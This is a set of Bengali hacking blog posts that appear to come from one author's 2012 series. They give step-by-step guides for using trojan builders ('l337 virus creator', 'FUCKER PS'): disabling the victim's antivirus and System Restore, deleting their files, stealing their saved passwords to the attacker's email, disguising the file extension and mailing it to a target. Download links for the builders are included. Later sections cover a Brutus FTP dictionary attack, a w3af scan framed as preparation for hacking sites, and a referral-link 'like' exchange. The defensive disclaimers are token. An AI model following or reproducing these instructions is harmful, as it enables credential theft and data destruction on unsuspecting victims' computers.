আশা করি এখন  BEAST সম্পর্কে আপনাদের মটামটি ধারনা হয়েছে আর কিভাবে এটা দিয়ে attack করতে হয় টা জানতে পারেছেন। অপরিচিত কেউ আপনাকে mail করে কোন ফাইল পাঠালে ডাউনলোড করার পর ওপেন করার আগে অবশ্যই স্ক্যান করে নিবেন।
অনেক সময় নিয়ে গুছিয়ে টিউন করেছি। জানি না আপনাদের কেমন লেগেছে।আর টিউন এ কোন ভুল হলে ধরিয়ে দিবেন। তাহলে পরবর্তীতে আড়ও ভাল টিউন করতে পারব। সবাই ভাল থাকবেন।
 শুরু হয়েছে “কে হবে ২০১২-এর শেরা TJ” আশা করি সবাই টিউন করার চেষ্টা করবেন। আর টিউন করতে না পারলে কমেন্ট করতে পারেন। কমেন্ট করলে-ও prize আছে।



   
(প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part-5]

0
0
1
0

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আগের ৩টা টিউন করে অনেক উৎসাহ পাইছি । তাই  আজকে আবার আর একটা মারাত্মক Trojan ভাইরাস দিয়ে কিভাবে অন্যজনের পিসি হ্যাক  করা যায় এবং কিভাবে এই ভাইরাসের আক্রমন থেকে বাচা  যায় এই নিয়ে টিউন করবো। Trojan ভাইরাস নিয়ে হয়ত এইটাই শেষ পর্ব।  এর পর ধারাবাহিক ভাবে লিখব কিভাব ওয়েবসাইট হ্যাক করতে হয়।  আমার Trojan নিয়ে টিউন করার এক মাত্র উদ্ধেশ হল এগুলো সম্পর্কে জানা এবং এর  হাত থেকে বাছের উপায়।    আমার টিউন পড়ে কেউ এর অপব্যবহার  করবেন না দয়াকরে। তবে জররি অবস্থায় এর ব্যাড ইয়ুস করতে পারেন… হাহাহাহ!! এখন শুরু করা যাক আজকের টিউন।

    প্রথম পর্বের টিউন টি পড়ার জন্য এখানে ক্লিক করুন। 
    দ্বিতীয়  পর্বের টিউন টি পড়ার জন্য এখানে ক্লিক করুন।
    তৃতীয়  পর্বের টিউন টি পড়ার জন্য এখানে ক্লিক করুন।
    ৪র্থ  পর্বের টিউন টি পড়ার জন্য এখানে ক্লিক করুন।  [loading]


পর্ব ৪এর টিউন টা এখনো সম্পূর্ণ হয় নাই। আর  যে Trojan নিয়ে টিউন করতে ছেয়েছিলাম ওইটা অনেক strong…তাই ভাবছি এখন ওইটা নিয়ে টিউন করব না। আগে কয়েক জনের সাথে কথা বলে দেখি। তারা যদি বলে তাহলে করব।
যাই হক পঞ্চম পর্বের টিউন শুরু করা জাক। এই পর্বের টিউন টা অনেক অনেক সহজ।

এই পর্বে যে trajon virus maker নিয়ে লিখব তার নাম হচ্চে l337 virus creator(Right Hand Man’s) । এইটাও অনেক শক্তিশালি সফটওয়্যার। কাজ করার আগে খুব সাবধান।
এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাস diasble করুন/ টোটালি অফ করুন। এন্টিভাইরাস টোটালি অফ করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে ভাইরাস  সফটওয়্যার হিসাবে ধরবে  এবং আপনাকে কাজ করতে দিবেনা।

প্রথম সফটওয়্যার টি ডাউনলোড করে নিন। http://www.mediafire.com/?oeqeph3atvodzuj

TJ Mir www.freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]









সফটওয়্যার টি ওপেন করার পর নিচের ছবির মত আসবে। এইটা হল কাঙ্ক্ষিত সফটওয়্যার। যেটা দিয়ে ভাইরাস l337 virus বানানো হবে।  software এর অপশন গুলো ভাল করে দেখেন। আর ভাবেন এইটা কতো শক্তিশালি ।

118 (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]

এখন শুরু করা যাক কিভাবে ভাইরাস বানাবেন।


*Funni Shit*1

funni shit এ প্রায় ১২, ১৩ টা অপশন আছে। এগুলো দিয়ে আপনি ভিকটিম এর পিসি-তে অনেক তাণ্ডব চালাতে পারেন।

29 (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]

অনেক গুলো থেকে আমি কয়েক টা অপশন নিয়ে লিখব। আর বাকি গুলো আপনারা নিজেই বুজতে পারবেন।

১। “lock keyboard” এইটা দিয়ে আপনি ভিকটিম আর কীবোর্ড লক করে দিতে পারেন। অর্থাৎ তার কীবোর্ড আর কাজ করবে না।

২। “lock mouse” এইটা দিয়ে আপনি ভিকটিম আর মাউস লক করে দিতে পারেন। অর্থাৎ তার মাউস  আর কাজ করবে না।

৩। “bloddy ghost background” এইটা দিয়ে আপনি ভিকটিম আর ডেস্কটপের ওয়ালপেপার পালটিয়ে দিতে পারেন। অর্থাৎ তার ডেক্সটপ-এর ওয়ালপেপার হবে একটা ভুতের ওয়ালপেপার ।

৪। “continuously open/close CD trays” এইটা দিয়ে আপনি ভিকটিম এর সিডি রম অটো খুলবে এবং বন্ধ করতে পারবেন।

৫। “turn monitor off every 2 minutes” এইটা দিয়ে আপনি ২ মিনিট পর পর ভিকটিম এর পিসি-র মনিটরের আলো অফ করে দিতে পারবেন।

*আশা করি এখন সব গুলো বুজতে পারেছেন। এখন আপনি কি কি তাণ্ডব চালাতে চান…যে যে তাণ্ডব চালাতে চান ওই গুলোতে টিক(mark) করুন। আপনি যে গুলতে টিক দিবেন ভাইরাস ওই ওই কাজ গুলো করবে।


“Disable Futures”2

এখন আসুন ২য় ধাপে। ২য় ধাপেও ১৫ টি অপশন রয়েছে। এগুলো হল কি কি ভিকটিম এর পিসি থেকে disable করবেন।

3 www.freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]

এখান থেকে আমি মাত্র কয়েক টা নিয়ে লিখব।

১।”CMD” PCর কনেক কাজ CMD দিয়ে করতে হয়। আর আপনি যদি CMD নির্বাচন করেন তাহলে victim আর CMD দিয়ে কাজ করতে পারবেন না।

২। “RUN” পিসি-র কনেক কাজ run command দিয়ে করতে হয়। আর আপনি যদি run নির্বাচন করেন তাহলে victim আর run command দিয়ে কাজ কোন করতে পারবেন না।

৩।”TIME” পিসি-র টাইম ত সবাই জানি। মানে ঘড়ি। আপনি চিকটিমএর পিসি-র ঘড়ি disable করে দিতে পারেন।

৪। “Search” সার্চ দিয়ে পিসি-র অনেক কিছু খুজে বের করতে হয়। আর আপনি তার পিসি-র সার্চ অপশন টি disable করে দিতে পারেন।

৫।”System Restore” এইটা অনেক একটা গরুত্তপূর্ণ জিনিশ। victim যদি জানতে পারে তার পিসি ভাইরাস দ্বারা আক্রান্ত, তাহলে সে উইন্ডোজ সেটআপ না  দিয়ে System Restore দিতে যাবে। কিন্তু আপনি যদি “System Restore” অপশন টা disable করে দিতে চান তাহলে ওই ঘর টা তে টিক দিম। তাইলে victim আর System Restore দিতে পারবে না।

*এখন আশা করি ২ এর সব গুলো জিনিশ বুজতে পারছেন।


“Hide Futures”3

Hide Futures এখান থেকে আপনি victim এর পিসি-তে কি কি hide(লোকাতে)চান  ওই ঘর গুলোতে টিক দিন ।

4 www.freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]

১। “Start Button” আপনারা ইচ্ছা করলে এইটা hide করে দিতে পারেন।

২। “All Desktop icon”  এগুলোও হাইড করে দিতে পারেন।

৩। “Volume Control” আপনারা ইচ্ছা করে সাউন্ড বাড়ানো কমানো অপশনও টি হাইড করে দিতে পারেন।

৪। “All Drive” আপনারা victimএর ড্রাইভ গুলোও হাইড করে দিতে পারেন।


 ”Antivirus Slaughter”4

“Antivirus Slaughter” হল অ্যান্টিভাইরাস disable করার অপশন।

5 www.freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]

* এই অপশন এর সব গুলো ঘরে টিক দিন। তাহলে victimএর পিসি-র যে অ্যান্টিভাইরাস সফটওয়্যার থাকবে টা কাজ করা stop করে দিবে।  তাইলে ভাইরাস টি ভাল ভাবে কাজ করতে পারবে।


“Payloads” 5

pay load হল আপনি ভিকটিম কে কি শাস্তি দিতে চান। যেমন ভিকটিম-এর অনেক কিছু ডিলিট করে শাস্তি দিতে পারেন।

6 www.freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]

উপরের ছবি(5)  তে দেখেন অনেক গুলো অপশন আছে। এখন আপনি যা যা ডিলিট করে দিতে চান ওগুলোতে টিক দিন।

১। যদি গান ডিলিট করে দিতে চান তাহলে delete*.mp3 তে টিক দিন।

২। যদি ফটো ডিলিট করে দিতে চান তাহলে delete*.jpg তে টিক দিন ।

৩। যদি ডকুমেন্ট ডিলিট করে দিতে চান তাহলে delete*.doc তে টিক দিন।

৪। যদি লেখার ফাইল  ডিলিট করে দিতে চান তাহলে delete*.txt তে টিক দিন।

5. যদি my music ফোল্ডার  ডিলিট করে দিতে চান তাহলে delete MyMusic তে টিক দিন।

*এখন আপনার ইচ্ছা মত আড়ও কিছু শাস্তি দিতে চাইলে ওই ঘর গুলোতে তিম দিন।


“Send Victim Info”6

এইটা হল আপনি victim এর কি কি ইনফর্মেশন পেতে চান।

7 www.freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]

আপনার যা যা ইনফর্মেশন লাগবে ওগুলোতে টিক দিন।  আর লিখতে ভাল লাগছে না। আশা করি বুজতে পারছেন……এখন “Sent victim info to this email address”এ আপনার ইমেইল অ্যাড্রেস লেখেন। তাহলে ভিকটিম এর ইনফো আপনার মেইল এ চলে আসবে।

এখন কাজ শেষ। এখন ভাইরাস বানানোর পালা।

9 www.freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]

এখন “Generate Virus” এ ক্লিক করে কাঙ্ক্ষিত ভাইরাস টি তৈরি করুন।

*****এখন ভাইরাসটির name এবং extension পরিবর্তন করুন। তাহলে নিচের ছবির মত দেখা যাবে। কিভাবে extensiঅন পরিবর্তন করবেন তা জানার জন্য আমার আগের টিউন গুলো দেখেন।

152 (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 5]name এবং extension পরিবর্তন করার পর compressed করে শত্রু কে মেইল করে পাঠিয়ে দিন। ফ্রী ইমেইল অ্যাড্রেস খুজছেন?? এখান থেকে নিন ৫০০ মিলিওন ইমেইল অ্যাড্রেস।
 ØÕএইটা অনেক অনেক strong একটা ট্রাজন । সফটওয়্যার আর নিছে দেখুন আড়ও ৬ তা জটিল অপশন আছে। ওগুলো নিয়ে
আর লিখলাম না। পরে  সময়  পাইলে লিখার চেষ্টা করবো। তবে ওগুলো নিয়ে নারাচারার চেষ্টা করবেন না। কোন ভুল হলে  আপনি
নিজেই  হ্যাক হয়ে জেতে পারেন। তাই be careful.  হ্যাকিং  নিয়ে আমার  টিউন চলতে  থাকবে।  আমাদের সঙ্ঘে  থাকুন। তাহলে
যারা নতুন তারা অনেক কিছু জানতে পারবেন।বিশেষ করে এইসব ভাইরাস এর আক্রমন থেকে বাচতেপারবেন। এখন  থেকে কেউ
এরকম ফাইল আপনাকে পাঠালে ওপেন করবেন না বরন  সাথে সাথে ডিলিট করে দিবেন। আর চেষ্টা করবেন ভাল অ্যান্টিভাইরাস
সফটওয়্যার ব্যাবহার করতে। Õ ØÖ ð®™Š ¶æ Õ ØÖ ð®™Š ¶æ Õ ØÖ ð®™Š ¶æ Õ ØÖ ð®™Š ¶æ Õ Ø
অনেক সময় নিয়ে গুছিয়ে টিউন করার চেষ্টা করেছি। জানি না কেমন হয়েছে। আর টিউন এ কোন ভুল হলে ধরিয়ে দিবেন। তাহলে
পরবর্তীতে আড়ও ভাল টিউন করতে পারব। ®™Š ¶æ Õ ØÖ ð®™Š ¶æ Õ ØÖ ð®™Š ¶æ Õ ØÖ ð®™Š ¶æ Õ Ø
আজ এই পর্যন্ত। ভাল থাকবেন। আর ৪র্থ টিউন প্রকাশিত হবে কি না জানি না। সবার মতামত চাই…যদি সবাই বলেন ৪র্থ টিউন
প্রকাশ করতে, তাহলে করবো।
আমার জন্য দয়া করবেন যেন এসএসসি-র ফলাফল ভাল হয়।
আর আমার টিউন কেমন হচ্ছে অবশ্যই কমেন্ট করে জানাবেন। একটা কমেন্ট করতে বেশি সময়  লাগে না, তাই দয়া করে কমেন্ট করবেন।

আজ ২৬ মার্চ… তাই সবার জন্য আমার বানানো একটা Bangladeshi  Flag


   
পিসি হ্যাক করে চুরি করুন অ্যাকাউন্ট , পাসওয়ার্ড এবং উলট পালট করে দিন ভিকটিমের সব কিছু Ø3xtreme Hacking TuneØ [Part-6]
লিখেছেন, Tj MiR বিভাগ, হ্যাকিং, হ্যাকিং / ক্রেকিং ও এন্টি হ্যাকিং তারিখ, ১৪ এপ্রিল ২০১২ ২৯ টি মন্তব্যFavoriteপ্রিয় টিউন প্রতি ক্লিকে নতুন কিছু যাদুর বাক্সে

0
0
2
0
শুভ নববর্ষের শুভেচ্ছা সবাইকে



আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আজকের টিউনে  সবাইকে স্বাগত । প্রায় ১ মাস আগে শুরু করেছিলাম ট্রোজান নিয়ে ধারাবাহিক টিউন। আজ ধারাবাহিক টিউনের ষষ্ঠ পর্ব। আর মাত্র কয়েক টি টিউন করব তারপর শেষ হয়ে যাবে । আজ আর কথা বাড়ালাম না। শুরু করা যাক আজকের টিউন।

অনেকের ধারণা হয়েছে আমি নাকি সফটওয়্যার সাথে ভাইরাস দেই। এইটা সম্পূর্ণ মিথ্যা । আমি নেট থেকে যেরকম ডাউনলোড করি ঠিক ওইরকম সফটওয়্যার টা মিডিয়াফায়ার-এ আপলোড করে আপনাদের দেই। অনেকের হয়ত সফটওয়্যার নিয়ে কোন problem হইছে তাই তারা এ কথাটা বলেছে। আজ আমি যে সফটওয়্যার টা নিয়ে লিখব, আশা করি এই সফটওয়্যার টা নিয়ে কারো কোন problem face করতে হবে না। আর আজকের টিউন টা অনেক ছোট এবং অনেক অনেক সহজ।

বিস্তারি টিউন লিখতে অনেক time লাগে। আর প্রতি পর্বে একই লেখা বার বার লেখতে ভালো লাগে না। তাই দয়া করে সবাই[যারা আগে টিউন গুলো পড়েন নাই] প্রথম পর্ব  থেকে পড়া শুরু করেন। তাহলে বিস্তারিত জানতে পারবেন। বিশেষ করে প্রথম পর্ব টা পড়েন।

    প্রথম   পর্ব।    “LORD PS”
    দ্বিতীয় পর্ব।    “ProRat v1.9 “
    তৃতীয়  পর্ব।   “Maya Password Stealer”
    পঞ্চম   পর্ব।    “l337 virus creator(Right Hand Man’s)”
    চতুর্থ   পর্ব।    “Beast”
    ষষ্ঠ পর্ব।         “FUCKER PS”

আজকে যে Trojan নিয়ে লিখব তার নাম হল “FUCKER PS’  । অনেকটা LordPS-এর মত।
এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাস diasble করুন/ টোটালি অফ করুন। এন্টিভাইরাস টোটালি অফ করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে ভাইরাস  সফটওয়্যার হিসাবে ধরবে  এবং আপনাকে কাজ করতে দিবেনা।

প্রথম সফটওয়্যার টি ডাউনলোড করে নিন http://www.mediafire.com/?hkcp1m11xbxqcyb

TJ Mir www.freecall24.blogspot.com পিসি হ্যাক করে চুরি করুন অ্যাকাউন্ট , পাসওয়ার্ড এবং উলট পালট করে দিন ভিকটিমের সব কিছু Ø3xtreme Hacking TuneØ [Part 6]

সফটওয়্যার টি ওপেন করার পর নিচের ছবির মত আসবে। এইটা হল কাঙ্ক্ষিত সফটওয়্যার। যেটা দিয়ে ভাইরাস Trojan virus বানানো হবে।

 1www.freecall24.blogspot.com bangla hackign tutorial hacking tj mir free call 24 free call fucker ps পিসি হ্যাক করে চুরি করুন অ্যাকাউন্ট , পাসওয়ার্ড এবং উলট পালট করে দিন ভিকটিমের সব কিছু Ø3xtreme Hacking TuneØ [Part 6]

www.freecall24.blogspot.com
এখন সফটওয়্যার-এর বাম পাশের অপশন গুলো দেখেন। দেখলে আপনারা নিজেরাই বুজতে পারবেন এখন কি করতে হবে। যদি আগের পর্ব গুলো দেখে থাকেন তাহিলে আমার আর কিছু বলতে হবে না মনে হয়।

যাই তাও কয়েক টা অপশন সম্পর্কে লিখব। এখানে ৩৪ টা অপশন আছে। আপনি ভিকতিমের পিসি-তে কি কি তান্দব চালাবেন ওই ঘর গুলোতে টিক(mark) দিবেন।

2www.freecall24.blogspot.com bangla hackign tutorial hacking tj mir free call 24 free call fucker ps পিসি হ্যাক করে চুরি করুন অ্যাকাউন্ট , পাসওয়ার্ড এবং উলট পালট করে দিন ভিকটিমের সব কিছু Ø3xtreme Hacking TuneØ [Part 6]

TJ M!R HACKING TUTORIAL
১..উপরের ছবটা দেখেন।এগুলো  হল আপনি ভিকটিমের পিসি-থেকে কি কি তথ্য পেতে চান। এখন আপনি যা যা চান সে ঘর গুলোতে টিক দিন। আপনি যদি
“”yahoo, Mns, phone number, OutLook, Intnet Explorer“”" এর পাসওয়ার্ড চান তাহলে ওই ঘর গুলোতে টিক দিন।

3www.freecall24.blogspot.com bangla hackign tutorial hacking tj mir free call 24 free call fucker ps Copy পিসি হ্যাক করে চুরি করুন অ্যাকাউন্ট , পাসওয়ার্ড এবং উলট পালট করে দিন ভিকটিমের সব কিছু Ø3xtreme Hacking TuneØ [Part 6]

2..এখন আপনি কিছু জিনিষ হাইড করে দিতে পারেন ভিকটিমের পিসি থেকে। যা হাইড করতে চান ওই ঘর গুলতে টিক দিন।

4www.freecall24.blogspot.com bangla hackign tutorial hacking tj mir free call 24 free call fucker ps Copy 2 পিসি হ্যাক করে চুরি করুন অ্যাকাউন্ট , পাসওয়ার্ড এবং উলট পালট করে দিন ভিকটিমের সব কিছু Ø3xtreme Hacking TuneØ [Part 6]

TJ M!R.
এখন “Disable kasper Spy & Disable Other Anti Virus” ঘর গুলোতে টিক দিন। তাহলে পরবর্তীতে ভিকটিমের অ্যান্টিভাইরাস কোন বাধা দিতে পারবে না। কারন তার অ্যান্টিভাইরাস disable হয়ে যাবে।
এখন আপনার ইচ্ছা মত বাকি ঘর গুলোতে টিক দিতে পারেন।

5www.freecall24.blogspot.com bangla hackign tutorial hacking tj mir free call 24 free call fucker ps পিসি হ্যাক করে চুরি করুন অ্যাকাউন্ট , পাসওয়ার্ড এবং উলট পালট করে দিন ভিকটিমের সব কিছু Ø3xtreme Hacking TuneØ [Part 6]

এখন “Sender”-এ আপনার মেইল গুলো লেখেন। এবং “Fake Error”-এ যেকোনো  বার্তা লেখেন। তারপর “Creat Server”-এ ক্লিক করে ভাইরাস ফাইলটি তৈরি করুন।

যে ফাইলটা  তৈরি হবে ওই ফাইলটা compressed করেন। তারপর ভিকটিম কে মেইল করে পাঠিয়ে দিন। ১ সাপ্তাহ পরে আপনি পেয়ে যাবেন সব তথ্য । “sender”এ যে মেইল অ্যাড্রেস গুলো দিছেন ওই মেইল গুলোতে নোটিফিকেশান আসবে। আগের পর্ব গুলো দেখেন। তা নাহলে কিছুই বুজবেন না ।

এই পর্বটা এখানেই শেষ ।

টিউনে কোন ভুল হলে আমাকে ধরিয়ে দিবেন। আর জানাবেন কি রকম টিউন আপনাদের পছন্দ । তাহলে পরবর্তীতে ভালো টিউন করতে পারব।

সবাই ভালো থাকবেন

হ্যাকিং এর A – Z (পর্ব ৪) ডিকশনারি অ্যাটাক:

হ্যাকিং এর A – Z (পর্ব ১) ভূমিকা ও প্রোগ্রামিং
হ্যাকিং এর A - Z (পর্ব ২) লিনাক্স
হ্যাকিং এর A - Z (পর্ব ৩) পাসওয়ার্ড হ্যাক এবং এন্টি হ্যাক
হ্যাকিং এর A - Z (পর্ব ৪) ডিকশনারি  অ্যাটাক

Dictionary Attack:

পাসওয়ার্ড যদি সহজ কিছু হয় তাহলে এই নিয়মে টা ক্র্যা-ক করা সম্ভব হয়। ডিকশনারি অ্যাটাকিং টুল একগুচ্ছ  নির্ধারিত শব্দ বারে বারে লগিনের সময় ব্যাবহার করে। উদাহরণটি দেখলেই পরিষ্কারভাবে বুঝতে পারবেন। কঠিন পাসওয়ার্ড ক্র্যা-কিং এর ক্ষেত্রে এ পদ্ধতি কাজ করে না।  নিম্নলিখিত উদাহরণে আমি একটি এফটিপি সার্ভারে ডিকশনারি অ্যাটাক দেখাতে Brutus ব্যাবহার করবো।

১) প্রথমে হ্যাকার একটি লক্ষ্য বেছে নিবে। ধরি আমার বাসার কম্পিউটার এর আইপি অ্যাড্রেস হলো  127.0.0.1 ।

২) এফটিপি তে যাওয়ার পর ftp://127.0.0.1 এ আমি উজারনেম এবং পাসওয়ার্ড এর জন্য একটি pop-up বাক্স দেখতে পাই।

৩) এরপর হ্যাকার পাসওয়ার্ড ক্র্যা-ক করার জন্য একটি প্রোগ্রাম চালু করবে। আমি এখানে Brutus ব্যাবহার করবো।

৪) টার্গেট ফিল্ডে আপনার আইপি বসান আর টাইপ হিসেবে এফটিপি সিলেক্ট করুন।

৫) ডিফল্ট পোর্ট ২১ কিন্তু কিছু ওয়েবসাইট বেশী নিরাপত্তার জন্য টা চেঞ্জ করে রাখে। তাঁর জন্য পোর্ট স্ক্যান করতে হয়। এটা নিয়ে পরে আলোচনা করবো।

৬) আপনাকে এফটিপি সাইটের উজারনেম জানতে হবে। না জানলে সবচেয়ে বেশী ব্যাবহার করা হয় এমন তালিকা পেতে হবে।

৭) একটি ডিকশনারি অ্যাটাক এর জন্য পাসমোড ও শব্দ তালিকা বেছে নিতে হবে। ব্রাউজ করে শব্দ তালিকা ভুক্ত ফাইলটি বেছে নিতে হবে। তাহলে কিছু ভালো পাসওয়ার্ড পেতে পারেন। http://packetstormsecurity.org/Crackers/wordlists/

নিচে কিছু  ইউজারনেম ও পাসওয়ার্ড কেমন হতে পারে দেয়া হলো।

৮ ) প্রোগ্রামটি চালু করার সাথে সাথে এটি সার্ভারে সংযোগ করবে এবং  তালিকা থেকে সমস্ত সম্ভব বিন্যাস চেষ্টা করতে শুরু করবে।

৯) যদি পাসওয়ার্ড সহজ হয় তাহলে সঠিক উজারনেম ও পাসওয়ার্ড এর বিন্যাস পেয়ে যাবেন। যেমন নিচে দেখুন ঠিক উজারনেম ও পাসওয়ার্ড এর বিন্যাসঃ

username : admin

password : catsanddog

১০) স্মার্ট হ্যাকার এরকম প্রোগ্রাম ব্যাবহার করার সময় প্রক্সি ব্যাবহার করবে। প্রক্সি আপনার কম্পিউটার এর আইপি হাইড করে অন্য একটি কম্পিউটার এর মাধ্যমে আপনার টার্গেট এ রিকুয়েস্ট পাঠাবে । Brutus টার্গেটেড সার্ভারে আপনার উপস্থিতির একটি বিশাল কার্যবিবরণী পাঠায়।

১১) এখানে দেখাই যাচ্ছে যে 127.0.0.1  হ্যাকার এর আইপি অ্যাড্রেস । এইসব চিহ্নের জন্য একজন হ্যাকার ধরা খায় এবং আইনের বিভিন্ন ঝামেলায় পরে ।

আপনি কি আপনার পোস্টে কয়েক ঘণ্টায় ১০০০+ লাইক পেতে চান… তবে নিচের কাজ গুলো করুন… বিফলে মুল্য ফেরত…

১। এই লিংক এ যান – http://www.like4like.org/?ref=tamim
২)প্রথমে register করুন
৩) রেজিস্ট্রেশন শেষ হলে লগ ইন করুন
৪) Add and Manage pages ট্যাব এ ক্লিক করুন।
৫) বাম পাশে দেখবেন অনেক গুলো অপশন এসেছে … এখান থেকে facebook like এ  ক্লিক করুন।
৬) নিচে ২য় বক্সে facebook url এ আপনার পেজ অথবা আপনি যে পোস্ট বা ছবি তে লাইক চান তার লিংক পোষ্ট করুন।
৭) add uRL এ কিক্ল করুন।
৮) এবার আবার উপরের Social Media Exchange ট্যাব এ ক্লিক করুন
৯) এখানে প্রথমেই facebook like এ ক্লিক করে প্রবেশ করুন।
১০) দেখুন অনেক গুলো like বাটন দেখা যাচ্ছে । যে কোন একটি ক্লিক করুন। নুতুন একটি উইন্ডো আসবে সেখানে যে পোষ্ট থাকবে তাতে like দিন।
১১) এভাবে একের পর এক লাইক দিয়ে পয়েন্ট জমাতে থাকুন।
১২) আর যত বেশি পয়েন্ট হবে অটো মেটিক আপনার পস্তেও একি ভাবে তত লাইক পরতে থাকবে।
বিশ্বাস হচ্ছে না… একবার চেষ্টা করেই দেখুন… কাজে না লাগলে বা প্রবলেম হলে জানাবেন। ধন্যবাদ…

w3af ব্যবহার করে ওয়েবসাইটের দুর্বলতা খোঁজার উপায়

কোন ওয়েবসাইট হ্যাক করার প্রথম শর্ত হচ্ছে ঐ ওয়েবসাইটটি সম্পর্কে তথ্য সমৃদ্ধ করা এবং পরে সেটার দুর্বলতা খুজেঁ বের করা যাতে সেই দুর্বলতা কাজে লাগিয়ে হ্যাকার তার কার্যোদ্ধার করতে পারে। আজ আমরা দেখব কিভাবে w3af ব্যবহার করে ওয়েবসাইটের দুর্বলতা খুজেঁ বের করা যায়। যদি আপনি BackTrack ব্যবহার করেন তাহলে আপনার জন্য কাজটি অতি সহজ হবে, কারন BackTrack এ w3af ইন্সটল করাই থাকে।

BackTrack ব্যবহারকারীদের জন্য
প্রথমে Application এ যান। তারপর BackTrack থেকে Exploitation এ যান। অত:পর Web Exploitation tools থেকে w3af gui তে ক্লিক করুন। নতুন উইন্ডো খুলবে। এটাই আমাদের w3af  ওয়ার্কিং স্ক্রিন।



উইন্ডোজ ব্যবহারকারীদের জন্য
উইন্ডোজ ব্যবহারকারীরা w3af ইন্টারনেট থেকে ডাউনলোড করে নিতে হবে।
প্রথমে http://sourceforge.net/projects/w3af/files/w3af/w3af%201.1/
 ক্লিক করে ডাউনলোড করে নিন।
এক্সট্রাক্ট করে ইনস্টল করে নিন।

w3af ব্যবহার করার নিয়ম
w3af ব্যবহার করা বেশ সহজ। যখন আপনি এতে ক্লিক করবেন নিচের মত একটি উইন্ডো পাবেন।


এখানে Target নামে একটি স্থান রয়েছে, যেখানে আপনি আপনার নির্ধারিত ওয়েবসাইটের এড্রেস বসাবেন। এছাড়াও নীচে Plugin ও Active নামে দুটি ট্যাব রয়েছে। ওয়েবসাইট এড্রেসটি টার্গেটে বসানোর পর আপনাকে উক্ত প্লাগিন সিলেক্ট করতে হবে স্ক্যান করার জন্য। যত বেশি প্লাগিন ব্যবহার করবেন, প্রক্রিয়াটি তত সময়সাপেক্ষ হবে। স্ক্যান টাইপ সিলেক্ট করে প্লে বাটন ক্লিক করুন।

স্ক্যানের ফলাফল
যখন স্ক্যান সমাপ্ত হবে তখন আপনি নিচের মত দেখতে পাবেন।


এবার নীচে ডান পাশে লক্ষ্য করুন। এখানে 2 0 0 নাম্বারসহ ভিন্ন ভিন্ন চিন্হের তিনটি পয়েন্টার রয়েছে। এগুলো হচ্ছে দুর্বলতার নাম্বার। যদি ২য় পয়েন্টারে নাম্বার পান, তাহলে ওয়েবসাইটটি হ্যাক করার সফলতা অনেক বেশি।


এখন Results এ যান, যেখানে আপনি স্ক্যানকৃত ফলাফল দেখতে পাবেন। উপরের উইন্ডোটিই হচ্ছে এক্সপ্লয়েট উইন্ডো। যদি আপনি মাঝের প্যানেলে কিছু দেখতে পান, তাহলে বুঝতে হবে ওয়েবসাইটটি হ্যাকিংয়ের জন্য উপযোগী। এখন আপনি প্রাপ্ত দুর্বলতাকে কাজে লাগিয়ে আপনার পছন্দ অনুযায়ী হ্যাকিংয়ের যেকোন পদ্ধতি ব্যবহার করে ওয়েবসাইটটি হ্যাক করতে পারেন।

ট্যাবনেবিং কি? ট্যাবনেবিং ব্যবহার করে ফেসবুক পাসওয়ার্ড হ্যাকের উপায়

